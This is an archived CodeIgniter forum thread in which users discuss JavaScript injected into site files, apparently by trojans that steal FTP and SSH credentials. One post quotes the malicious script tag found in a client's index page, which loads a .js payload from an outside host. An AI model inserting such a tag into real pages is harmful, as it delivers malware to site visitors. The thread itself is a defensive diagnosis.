Welcome Guest, Not a member yet? Register   Sign In
CodeIgniter Forums Archived Discussions Archived General Discussion Javascript injection
Javascript injection
  • El Forum
    Guest
  •  
#1
07-05-2010, 11:54 AM

[eluser]TheIgniter[/eluser]
I just read this article :
Code:
http://ellislab.com/forums/viewthread/149326/#725088
Quote: It is not a CodeIgniter exploit.
That exploit has been going around for last couple of months, and it is linked to compromised ftp, sftp and ssh accounts.
A trojan on a machine captures the ftp/sftp/ssh login information and then appends a Javascript payload downloading code to one or more .php,.html files.


Is that true, so it mean that the host no secure ? There is no other way to inject javascript in the index page?
  • El Forum
    Guest
  •  
#2
07-05-2010, 12:14 PM

[eluser]garymardell[/eluser]
The trojan will most likely be on the person connecting to the servers computer and just take the information and then run these automated updating of files. The host is probably secure, however the person connecting is not. There are other ways to inject javascript depending on the script and the provisions in place to deal with such attacks. However not to edit the file itself.
  • El Forum
    Guest
  •  
#3
07-05-2010, 12:24 PM

[eluser]TheIgniter[/eluser]
thanks gary for your reply! well, a friend of mine had this problem.. in the the site of his client, he found in the index page of codeigniter some badware :
Code:
<scri> src="http://soaoo.blog-salopes.com:8080/Unmount.js"></scr>
..
so there is 2 possibility :
- The computer of my friend infected
- The host is not secure ( He use supreme center )




Theme © iAndrew 2016 - Forum software by © MyBB